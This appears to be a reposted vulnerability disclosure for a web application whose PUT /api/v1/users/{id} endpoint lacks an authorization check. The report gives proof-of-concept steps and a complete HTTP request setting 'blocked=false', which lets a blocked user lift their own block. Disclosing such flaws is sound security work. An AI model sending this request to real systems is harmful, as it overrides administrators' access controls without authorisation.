A User Can Unblock Themself
Discription

# Description

`PUT /api/v1/users/{id}` API doesn’t properly check the authorizaion.

# Proof of Concept

1. [admin] Enable user registration functionality.
2. [user] Register new user and login as them.
3. [user] Create OAuth client.
4. [admin] Block the new user on admin panel.
5. [user] Send the following request:

“`http
PUT /api/v1/users/{id} HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: application/vnd.api+json
Authorization: Bearer {JWT}
Cache-Control: no-cache
Host: localhost:8888
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 13

blocked=false
“`

6. [user] Login successfully.Read More

Back to Main

Subscribe for the latest news:
Generated by Feedzy
%d bloggers like this: